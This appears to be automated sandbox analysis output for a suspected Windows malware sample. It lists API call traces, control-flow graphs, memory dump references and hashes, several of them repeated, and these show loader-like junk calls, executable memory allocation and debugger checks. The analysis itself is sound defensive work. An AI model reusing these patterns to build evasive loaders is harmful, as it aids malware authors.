                control_flow_graph 87 2360420-23604f8 89 23604ff-236053c CreateWindowExA 87->89 90 23604fa 87->90 92 2360540-2360558 PostMessageA 89->92 93 236053e 89->93 91 23605aa-23605ad 90->91 94 236055f-2360563 92->94 93->91 94->91 95 2360565-2360579 94->95 95->91 97 236057b-2360582 95->97 98 2360584-2360588 97->98 99 23605a8 97->99 98->99 100 236058a-2360591 98->100 99->94 100->99 101 2360593-2360597 call 2360110 100->101 103 236059c-23605a5 101->103 103->99
                APIs
                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02360533
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CreateWindow
                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                • API String ID: 716092398-2341455598
                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction ID: 2da72947ca7ab955f062aede080f58cf1638ff81542f0bd12f0339e75d8e4040
                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction Fuzzy Hash: F7511A70D08388DAEB15CBD8C849BEDBFB66F11708F144058D5447F28AC3FA5659CB66

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 104 23605b0-23605d5 105 23605dc-23605e0 104->105 106 23605e2-23605f5 GetFileAttributesA 105->106 107 236061e-2360621 105->107 108 23605f7-23605fe 106->108 109 2360613-236061c 106->109 108->109 110 2360600-236060b call 2360420 108->110 109->105 112 2360610 110->112 112->109
                APIs
                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 023605EC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID: apfHQ$o
                • API String ID: 3188754299-2999369273
                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction ID: 667172a0a74e72a21ebf6668c8796e2a893653cc3a95b7704449749f33336de1
                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction Fuzzy Hash: F8012170C0425CEEDF15DB98C5193AEBFB9AF41308F1480D9C4592B242D7769B58CBA1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 126 22c9485-22c94bf call 22c9798 129 22c950d 126->129 130 22c94c1-22c94f4 VirtualAlloc call 22c9512 126->130 129->129 132 22c94f9-22c950b 130->132 132->129
                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 022C94D6
                Memory Dump Source
                • Source File: 00000000.00000002.1232942398.00000000022C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 022C9000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_22c9000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction ID: 14d4bb4c406c332045cdf008685b3109910001ea914157403143c40d8b567546
                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                • Instruction Fuzzy Hash: DA113979A00208EFDB01DF98C985E99BBF5EF08350F1580A4F9489B361D371EA90EF80

                Control-flow Graph

                APIs
                • GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0040364F
                • CreateJobObjectW.KERNEL32(00000000,werokatanesibulowo), ref: 0040365B
                • GetConsoleAliasExesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 0040366A
                • EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00403673
                • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403681
                • GetProcessVersion.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 00403688
                • SetFileShortNameA.KERNEL32(00000000,00000000), ref: 00403690
                • SetProcessShutdownParameters.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 00403698
                • GetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004036A4
                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004036AB
                • GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 004036B4
                • GetNumberFormatA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0040379C
                • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 004037A7
                • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004037B8
                • SetVolumeMountPointA.KERNEL32(00000000,periyebobowonulaj), ref: 004037C4
                • CreateHardLinkA.KERNEL32(tijizovepazohuxibubupanajedidud,vanajapirelexugeyoya,00000000), ref: 004037D1
                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004037DC
                • SetCommState.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037E4
                • GetTempPathA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037F3
                • _memset.LIBCMT ref: 00403805
                • CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 00403814
                • CreateActCtxA.KERNEL32(?), ref: 00403822
                • EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040382C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Create$FileInfo$CalendarCommEnumFormatNameNumberProcessVersion$AliasConfigConsoleDateDialogDriveExesFormatsHardLibraryLinkLoadLogicalModuleMountNamedObjectParametersPathPipePointShortShutdownStateStringsTempUnlockVerifyVolume_memset
                • String ID: $Fidowivologobe$periyebobowonulaj$tijizovepazohuxibubupanajedidud$vanajapirelexugeyoya$werokatanesibulowo
                • API String ID: 3661458681-1693462513
                • Opcode ID: eeb5ed0d94c8fed7e54892a73c06fda7e278159d2a01c58d13d1c183c16f05e9
                • Instruction ID: d0a06b94d87111463b208d9b00102714d4cc8daabb5631183cdad218cb79e479
                • Opcode Fuzzy Hash: eeb5ed0d94c8fed7e54892a73c06fda7e278159d2a01c58d13d1c183c16f05e9
                • Instruction Fuzzy Hash: E8817C75506260AFC320DF55DE4899FBFE8FF8A751F00442EF589A3260C7349A45CBAA

                Control-flow Graph

                APIs
                • GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0040364F
                • CreateJobObjectW.KERNEL32(00000000,werokatanesibulowo), ref: 0040365B
                • GetConsoleAliasExesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 0040366A
                • EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00403673
                • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403681
                • GetProcessVersion.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 00403688
                • SetFileShortNameA.KERNEL32(00000000,00000000), ref: 00403690
                • SetProcessShutdownParameters.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 00403698
                • GetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004036A4
                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004036AB
                • GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 004036B4
                • GetNumberFormatA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0040379C
                • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 004037A7
                • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004037B8
                • SetVolumeMountPointA.KERNEL32(00000000,periyebobowonulaj), ref: 004037C4
                • CreateHardLinkA.KERNEL32(tijizovepazohuxibubupanajedidud,vanajapirelexugeyoya,00000000), ref: 004037D1
                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004037DC
                • SetCommState.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037E4
                • GetTempPathA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037F3
                • _memset.LIBCMT ref: 00403805
                • CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 00403814
                • CreateActCtxA.KERNEL32(?), ref: 00403822
                • EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040382C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Create$FileInfo$CalendarCommEnumFormatNameNumberProcessVersion$AliasConfigConsoleDateDialogDriveExesFormatsHardLibraryLinkLoadLogicalModuleMountNamedObjectParametersPathPipePointShortShutdownStateStringsTempUnlockVerifyVolume_memset
                • String ID: $Fidowivologobe$periyebobowonulaj$tijizovepazohuxibubupanajedidud$vanajapirelexugeyoya$werokatanesibulowo
                • API String ID: 3661458681-1693462513
                • Opcode ID: 9654d4f228e0ba4d77ab0b8fe357454f8465955ccc391f4c74cc3bca01d7bed0
                • Instruction ID: f68eb26a0aed4cdc4c15122984545acf650f0f240818527a75695e4f3843e8d9
                • Opcode Fuzzy Hash: 9654d4f228e0ba4d77ab0b8fe357454f8465955ccc391f4c74cc3bca01d7bed0
                • Instruction Fuzzy Hash: B9715A71406260AFD320CF65DE48A9FBFE8FF8A751F00442DF589A3260D7349645CBAA

                Control-flow Graph

                APIs
                • GetNumberFormatW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0040364F
                • CreateJobObjectW.KERNEL32(00000000,werokatanesibulowo), ref: 0040365B
                • GetConsoleAliasExesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 0040366A
                • EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 00403673
                • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403681
                • GetProcessVersion.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 00403688
                • SetFileShortNameA.KERNEL32(00000000,00000000), ref: 00403690
                • SetProcessShutdownParameters.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 00403698
                • GetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004036A4
                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004036AB
                • GetModuleFileNameW.KERNEL32(00000000,00000000,00000000), ref: 004036B4
                • GetNumberFormatA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0040379C
                • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 004037A7
                • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004037B8
                • SetVolumeMountPointA.KERNEL32(00000000,periyebobowonulaj), ref: 004037C4
                • CreateHardLinkA.KERNEL32(tijizovepazohuxibubupanajedidud,vanajapirelexugeyoya,00000000), ref: 004037D1
                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004037DC
                • SetCommState.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037E4
                • GetTempPathA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037F3
                • _memset.LIBCMT ref: 00403805
                • CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 00403814
                • CreateActCtxA.KERNEL32(?), ref: 00403822
                • EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040382C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Create$FileInfo$CalendarCommEnumFormatNameNumberProcessVersion$AliasConfigConsoleDateDialogDriveExesFormatsHardLibraryLinkLoadLogicalModuleMountNamedObjectParametersPathPipePointShortShutdownStateStringsTempUnlockVerifyVolume_memset
                • String ID: $Fidowivologobe$periyebobowonulaj$tijizovepazohuxibubupanajedidud$vanajapirelexugeyoya$werokatanesibulowo
                • API String ID: 3661458681-1693462513
                • Opcode ID: 8cbbe8aad74cd2ab5445bf0f3a8bece14ad594e5198c0319760abc936fd5aff9
                • Instruction ID: 53ad46d36bff19742a9320b0afe7630b043df2f11a08ffcc62ad2f013a45b4bc
                • Opcode Fuzzy Hash: 8cbbe8aad74cd2ab5445bf0f3a8bece14ad594e5198c0319760abc936fd5aff9
                • Instruction Fuzzy Hash: 9E715A71406260AFD310CF65DE48A9FBFE8FF8A751F00442DF589A3260D7349645CBAA
                APIs
                  • Part of subcall function 004057D1: EncodePointer.KERNEL32(00000000,00408E8A,004B9778,00000314,00000000,?,?,?,?,?,0040656D,004B9778,Microsoft Visual C++ Runtime Library,00012010), ref: 004057D3
                • LoadLibraryW.KERNEL32(USER32.DLL,004B9778,00000314,00000000), ref: 00408E9F
                • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 00408EBB
                • EncodePointer.KERNEL32(00000000), ref: 00408ECC
                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00408ED9
                • EncodePointer.KERNEL32(00000000), ref: 00408EDC
                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00408EE9
                • EncodePointer.KERNEL32(00000000), ref: 00408EEC
                • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00408EF9
                • EncodePointer.KERNEL32(00000000), ref: 00408EFC
                • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00408F0D
                • EncodePointer.KERNEL32(00000000), ref: 00408F10
                • DecodePointer.KERNEL32(?,004B9778,00000314,00000000), ref: 00408F32
                • DecodePointer.KERNEL32 ref: 00408F3C
                • DecodePointer.KERNEL32(?,004B9778,00000314,00000000), ref: 00408F7B
                • DecodePointer.KERNEL32(?), ref: 00408F95
                • DecodePointer.KERNEL32(004B9778,00000314,00000000), ref: 00408FA9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Pointer$Encode$AddressDecodeProc$LibraryLoad
                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                • API String ID: 1951731885-564504941
                • Opcode ID: 75b43804a2e143ef067d3df5407a0ff2623a6f5c28aa531d809509dfb2e5bd12
                • Instruction ID: 3bd6f5cb5e65ec75d1e460980babf14b029c5559ef115af35b4f11a111fc60cc
                • Opcode Fuzzy Hash: 75b43804a2e143ef067d3df5407a0ff2623a6f5c28aa531d809509dfb2e5bd12
                • Instruction Fuzzy Hash: 7B411F71A0020AABDF10EFB99E45E6F7AA9AF44350F14053AE544F3290DF78D9508F69
                APIs
                • GetNumberFormatA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 0040379C
                • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 004037A7
                • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 004037B8
                • SetVolumeMountPointA.KERNEL32(00000000,periyebobowonulaj), ref: 004037C4
                • CreateHardLinkA.KERNEL32(tijizovepazohuxibubupanajedidud,vanajapirelexugeyoya,00000000), ref: 004037D1
                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004037DC
                • SetCommState.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037E4
                • GetTempPathA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 004037F3
                • _memset.LIBCMT ref: 00403805
                • CommConfigDialogW.KERNEL32(00000000,00000000,?), ref: 00403814
                • CreateActCtxA.KERNEL32(?), ref: 00403822
                • EnumCalendarInfoExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040382C
                • GetLocaleInfoA.KERNEL32(00000000,00000000,?,00000000), ref: 0040383D
                • ReadConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 0040385A
                • SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 00403862
                • GetConsoleAliasExesLengthW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000CC), ref: 00403892
                • CreateEventW.KERNEL32(00000000,00000000,00000000,Fidowivologobe), ref: 004038A3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: CreateInfo$CommConsoleMountPointVolume$AliasCalendarConfigDialogDriveEnumEventExesFileFormatHardInputLengthLinkLocaleLogicalNumberPathReadStateStringsTempUnlockVerifyVersion_memset
                • String ID: Fidowivologobe$periyebobowonulaj$tijizovepazohuxibubupanajedidud$vanajapirelexugeyoya
                • API String ID: 3302057559-615381572
                • Opcode ID: c8fd9daa9a024cd56d6b54a367a5d9827efae000f0fb5ba90e3cc3d3b541e272
                • Instruction ID: 12ceed9113a581727385d43aaad1376cfeeea892591a91eee3089c40789bf332
                • Opcode Fuzzy Hash: c8fd9daa9a024cd56d6b54a367a5d9827efae000f0fb5ba90e3cc3d3b541e272
                • Instruction Fuzzy Hash: 81516D71505350AFD310CF65DD48A9FBFE8EF89751F00882EF589A3260D7349A45CBAA
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset$_free_malloc_strstr$_wcsstr
                • String ID: "
                • API String ID: 430003804-123907689
                • Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                • Instruction ID: 48fb6c23d10266bfb26f12d060a57afc5313671f473f07c49b0d2bcb1033f581
                • Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
                • Instruction Fuzzy Hash: D642D471508380ABDB30EF24CC48B9B7BE9BF85308F04092DF58997691DB79D509CBA2
                APIs
                • __invoke_watson.LIBCMT ref: 0040C594
                  • Part of subcall function 00405DD2: __call_reportfault.LIBCMT ref: 00405DDF
                  • Part of subcall function 00405DD2: GetCurrentProcess.KERNEL32(C0000417), ref: 00405DE8
                  • Part of subcall function 00405DD2: TerminateProcess.KERNEL32(00000000), ref: 00405DEF
                • _strcpy_s.LIBCMT ref: 0040C5C9
                • _strcpy_s.LIBCMT ref: 0040C5E6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Process_strcpy_s$CurrentTerminate__call_reportfault__invoke_watson
                • String ID: 0.J$1#IND$1#INF$1#QNAN$1#SNAN$T
                • API String ID: 3411476474-3360019993
                • Opcode ID: 7d4b52dfde62bc681df78c989b3cfe495454acca20ca7980ed113197c00d98ce
                • Instruction ID: 3cb3a14252bbc472cf2dc9295facea95fd2a9af57740bec66b583bad18b10278
                • Opcode Fuzzy Hash: 7d4b52dfde62bc681df78c989b3cfe495454acca20ca7980ed113197c00d98ce
                • Instruction Fuzzy Hash: CF526D76D0065ACBDF24CFA8C8912AEB7B1FF54300F54827BD805BB281E7789945CB89
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: <$x2Q
                • API String ID: 2102423945-643667464
                • Opcode ID: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                • Instruction ID: 352d7f261c1b19aeff49fbce346eb770a06dbcb306b27313398e81d0864015db
                • Opcode Fuzzy Hash: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
                • Instruction Fuzzy Hash: A7D2A071508341ABDB34EF24D894B9FBBF6BF94308F00492DE58587291EB79A509CF92
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                • Instruction ID: f16ff4718b2a55d757ba5075e6a58bbf67dadfba919676b8d8799852816f9fef
                • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                • Instruction Fuzzy Hash: F5527E71D10248DBDF24DFA8C895BDEB7F5BF14308F108169D419AB290E739AA49CFA1
                APIs
                • _wcsstr.LIBCMT ref: 0236E72D
                • _wcsstr.LIBCMT ref: 0236E756
                • _memset.LIBCMT ref: 0236E784
                  • Part of subcall function 023AFC0C: std::exception::exception.LIBCMT ref: 023AFC1F
                  • Part of subcall function 023AFC0C: __CxxThrowException@8.LIBCMT ref: 023AFC34
                  • Part of subcall function 023AFC0C: std::exception::exception.LIBCMT ref: 023AFC4D
                  • Part of subcall function 023AFC0C: __CxxThrowException@8.LIBCMT ref: 023AFC62
                  • Part of subcall function 023AFC0C: std::regex_error::regex_error.LIBCPMT ref: 023AFC74
                  • Part of subcall function 023AFC0C: __CxxThrowException@8.LIBCMT ref: 023AFC82
                  • Part of subcall function 023AFC0C: std::exception::exception.LIBCMT ref: 023AFC9B
                  • Part of subcall function 023AFC0C: __CxxThrowException@8.LIBCMT ref: 023AFCB0
                • _wcsstr.LIBCMT ref: 0236EA0C
                • _memset.LIBCMT ref: 0236EE5C
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                • String ID:
                • API String ID: 1338678108-0
                • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                • Instruction ID: 489c2038a35b75f49aa54d693ea041d3298affbfa300465ed10af647cdfa7259
                • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                • Instruction Fuzzy Hash: 6652D175A003099FCF24CF68C898BAEBBF9FF04304F148569D846AB285D7719949CF91
                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00409A37
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00409A4C
                • UnhandledExceptionFilter.KERNEL32(00402B5C), ref: 00409A57
                • GetCurrentProcess.KERNEL32(C0000409), ref: 00409A73
                • TerminateProcess.KERNEL32(00000000), ref: 00409A7A
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID:
                • API String ID: 2579439406-0
                • Opcode ID: c300b549e13fec5c31b588df8ad9cbc436bab0dcc87fd90aca7c005ea68984da
                • Instruction ID: c0321ec8be0c87656a769b50352e65d88f03d911ecbf24befd87e90af00fa050
                • Opcode Fuzzy Hash: c300b549e13fec5c31b588df8ad9cbc436bab0dcc87fd90aca7c005ea68984da
                • Instruction Fuzzy Hash: E321E3B4905344DFDB58DF69EA496443BB4FB48300F1042BAE509A77B0E7B659A1CF0E
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
